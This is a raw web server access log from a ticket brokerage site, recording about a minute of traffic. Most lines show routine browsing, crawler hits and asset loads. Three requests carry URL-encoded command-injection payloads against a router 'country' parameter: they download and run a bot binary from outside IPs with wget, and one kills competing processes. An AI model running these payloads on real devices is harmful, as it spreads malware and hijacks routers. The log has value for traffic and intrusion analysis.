135.181.213.220 - - [19/Jun/2024:23:43:29 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=94E2AF31-F580-541B-5291-6F641D53DDC4 HTTP/1.1" 404 -
54.36.148.89 - - [19/Jun/2024:23:43:32 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 77809
135.181.213.220 - - [19/Jun/2024:23:43:34 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=958F3457-7711-5A29-3C46-AA6B8EE9130B HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:43:39 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=95A3D15C-D69A-531F-0C36-71C87FA60F10 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:43:44 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9842E135-D7D8-58A9-22CE-447B8B760D6A HTTP/1.1" 404 -
114.119.148.108 - - [19/Jun/2024:23:43:45 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=E462A33E-CFF3-5A74-C9A7-96B6A6F1D497 HTTP/1.1" 200 88462
135.181.213.220 - - [19/Jun/2024:23:43:49 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9B260336-6FDD-E5CB-3E80-9A3C9AFB5D44 HTTP/1.1" 404 -
114.119.141.139 - - [19/Jun/2024:23:43:50 +0200] "GET /ticket2/opencms/fi/en/buy/?page=1&edid=3B27AD89-9F82-3E38-96F3-9D7DBA03001A HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:43:53 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9E2BABA4-324D-20A1-774C-4B6A52C1BFAE HTTP/1.1" 404 -
54.36.148.241 - - [19/Jun/2024:23:43:56 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 74933
85.208.96.195 - - [19/Jun/2024:23:43:57 +0200] "GET /ticket2/opencms/nl/magazine/article?title=newcastle-upon-tyne HTTP/1.1" 200 76046
135.181.213.220 - - [19/Jun/2024:23:43:58 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9EA0A31F-ADBF-5DCC-8D42-27AFCDACCEE8 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:03 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=A45A2276-F6E8-9B6C-BF9F-6181D9B211FE HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:08 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=B7556BBF-A0A8-2F92-B926-719CE5F24544 HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:23:44:08 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
139.59.157.196 - - [19/Jun/2024:23:44:12 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:13 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=EADB2551-31E0-F453-4E09-8D55CAAF6346 HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:23:44:13 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
135.181.213.220 - - [19/Jun/2024:23:44:18 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=F4A4214A-173A-24D9-46A5-9C59029B334D HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:22 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=F5FC087D-1DE1-C78F-57B4-B67225F5C792 HTTP/1.1" 404 -
45.148.10.174 - - [19/Jun/2024:23:44:25 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560for+proc_dir+in+%252Fproc%252F%255B0-9%255D%252A%253B+do+pid%253D%2524%257Bproc_dir%2523%2523%252A%252F%257D%253B+buffer%253D%2524%2528cat+%2522%252Fproc%252F%2524pid%252Fmaps%2522%2529%253B+if+%255B+%2522%2524%257B%2523buffer%257D%2522+-gt+1+%255D%253B+then+if+%255B+%2522%2524%257Bbuffer%2523%252A%2522%252Flib%252F%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D+%2526%2526+%255B+%2522%2524%257Bbuffer%2523%252A%2522telnetdbot%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D%253B+then+kill+-9+%2522%2524pid%2522%253B+fi%253B+fi%253B+done%2560) HTTP/1.1" 404 -
45.148.10.174 - - [19/Jun/2024:23:44:25 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560cd+%252Ftmp%253B+rm+-rf+shk%253B+wget+http%253A%252F%252F45.148.10.78%252Fshk%253B+chmod+777+shk%253B+.%252Fshk+tplink%253B+rm+-rf+shk%2560) HTTP/1.1" 404 -
54.36.148.244 - - [19/Jun/2024:23:44:26 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/serie-a/udinese/ HTTP/1.1" 200 72550
135.181.213.220 - - [19/Jun/2024:23:44:27 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=F67B956B-36BE-A0A2-425A-C26AA6E4EF95 HTTP/1.1" 404 -
185.191.127.212 - - [19/Jun/2024:23:44:32 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560wget+http%253A%252F%252F103.149.28.141%252Ft+-O-+%7c+sh%2560) HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:32 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=F7218BAF-D4BF-FE09-3DBA-65101541DC24 HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:23:44:33 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [19/Jun/2024:23:44:33 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
31.220.87.217 - - [19/Jun/2024:23:44:36 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=99379E05-2895-DA9A-DA07-9A2A949F9132&sortorder=asc&column=section HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:37 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=F7285C8B-A3C4-2AD3-AE62-5BC7D6BC7F7A HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:42 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=FC8E19AE-C0B2-6E8A-15B8-33A65B1EFF7E HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:47 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=FCEE0D9D-5AA1-62E1-DDE7-F2C006A40E22 HTTP/1.1" 404 -
54.36.148.217 - - [19/Jun/2024:23:44:48 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/fa_cup/ HTTP/1.1" 200 74987
135.181.213.220 - - [19/Jun/2024:23:44:52 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=FFB9CA5C-42F4-70F4-CC7E-EEC2EB82C4FB HTTP/1.1" 404 -
82.170.137.97 - - [19/Jun/2024:23:44:53 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=/nl/buy/index.html%3Fpage%3D1%26edid%3DFB919A6A-DE02-1353-FDB8-CEDFF340E9B7%26hlv%3D65ba1930-8138-422d-8616-17d10a01000f%23v1090073965 HTTP/1.1" 200 225
66.249.75.131 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=69C4AD8E-60B2-A255-9B8E-BD4F83D22F14 HTTP/1.1" 200 109965
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/nl/buy/?page=1&edid=FB919A6A-DE02-1353-FDB8-CEDFF340E9B7&hlv=65ba1930-8138-422d-8616-17d10a01000f HTTP/1.1" 200 96985
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/venue/signal_iduna_park.jpg HTTP/1.1" 200 12842
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/nl/ask-form.html HTTP/1.1" 200 3015
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/0.gif HTTP/1.1" 200 43
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/ticket_info_button.png HTTP/1.1" 200 3820
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/img/icons/globe-white.png HTTP/1.1" 200 947
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
82.170.137.97 - - [19/Jun/2024:23:44:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 200 1706
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/arrow.gif HTTP/1.1" 200 344
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/form_marker.gif HTTP/1.1" 200 43
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_left.gif HTTP/1.1" 200 232
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_center.gif HTTP/1.1" 200 66
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_right.gif HTTP/1.1" 200 232
82.170.137.97 - - [19/Jun/2024:23:44:55 +0200] "GET /ticket2/opencms/img/icons/en.png HTTP/1.1" 200 2415
82.170.137.97 - - [19/Jun/2024:23:44:56 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
82.170.137.97 - - [19/Jun/2024:23:44:56 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
82.170.137.97 - - [19/Jun/2024:23:44:56 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 200 1785
82.170.137.97 - - [19/Jun/2024:23:44:56 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
82.170.137.97 - - [19/Jun/2024:23:44:56 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
82.170.137.97 - - [19/Jun/2024:23:44:57 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
82.170.137.97 - - [19/Jun/2024:23:44:57 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
82.170.137.97 - - [19/Jun/2024:23:44:58 +0200] "GET /ticket2/opencms/img/icons/it.png HTTP/1.1" 200 2040
82.170.137.97 - - [19/Jun/2024:23:44:58 +0200] "GET /ticket2/opencms/img/arrow-down.png HTTP/1.1" 200 192
82.170.137.97 - - [19/Jun/2024:23:44:58 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
82.170.137.97 - - [19/Jun/2024:23:44:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
82.170.137.97 - - [19/Jun/2024:23:44:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:44:59 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/bundesliga/hertha/ HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:45:04 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/bundesliga/hoffenheim/ HTTP/1.1" 404 -
47.128.34.146 - - [19/Jun/2024:23:45:05 +0200] "GET /ticket2/opencms/fi/buy/?edid=C65C7DD7-B53E-6743-1299-72135D790427 HTTP/1.1" 200 73261
47.128.34.146 - - [19/Jun/2024:23:45:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.34.146 - - [19/Jun/2024:23:45:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.34.146 - - [19/Jun/2024:23:45:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.34.146 - - [19/Jun/2024:23:45:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.34.146 - - [19/Jun/2024:23:45:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.34.146 - - [19/Jun/2024:23:45:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.34.146 - - [19/Jun/2024:23:45:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=/dk/buy/index.html%3Fpage%3D1%26edid%3D8D7E4EA3-ED35-1CF7-A7BE-8DD27899E495%26hlv%3D65ba1071-f1f0-4e3a-9a61-118f0a01000f%23v945412564 HTTP/1.1" 200 224
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=8D7E4EA3-ED35-1CF7-A7BE-8DD27899E495&hlv=65ba1071-f1f0-4e3a-9a61-118f0a01000f HTTP/1.1" 200 97021
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
114.119.133.87 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=067C6AFC-1AC2-2DB9-D3FA-B569A9607048 HTTP/1.1" 200 88258
135.181.213.220 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/la-liga/celta_vigo/ HTTP/1.1" 404 -
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/img/icons/globe-white.png HTTP/1.1" 200 947
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/venue/allianz_arena.png HTTP/1.1" 200 55702
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/0.gif HTTP/1.1" 200 43
85.27.201.41 - - [19/Jun/2024:23:45:09 +0200] "GET /ticket2/opencms/dk/ask-form.html HTTP/1.1" 200 2971
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/ticket_info_button.png HTTP/1.1" 200 3820
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 200 1706
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 200 1785
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/arrow.gif HTTP/1.1" 200 344
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_left.gif HTTP/1.1" 200 232
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/form_marker.gif HTTP/1.1" 200 43
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_right.gif HTTP/1.1" 200 232
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_center.gif HTTP/1.1" 200 66
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/it.png HTTP/1.1" 200 2040
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/icons/en.png HTTP/1.1" 200 2415
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/img/arrow-down.png HTTP/1.1" 200 192
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
85.27.201.41 - - [19/Jun/2024:23:45:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
